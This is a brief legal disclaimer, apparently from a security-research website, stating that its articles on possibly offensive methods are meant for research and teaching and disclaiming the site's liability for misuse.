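Disclaimer: the programs (methods) covered in this article may be offensive in nature and are intended only for security research and teaching. Readers who use this information for other purposes bear all legal and joint liability; this site bears no legal or joint liability. If there is a problem, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).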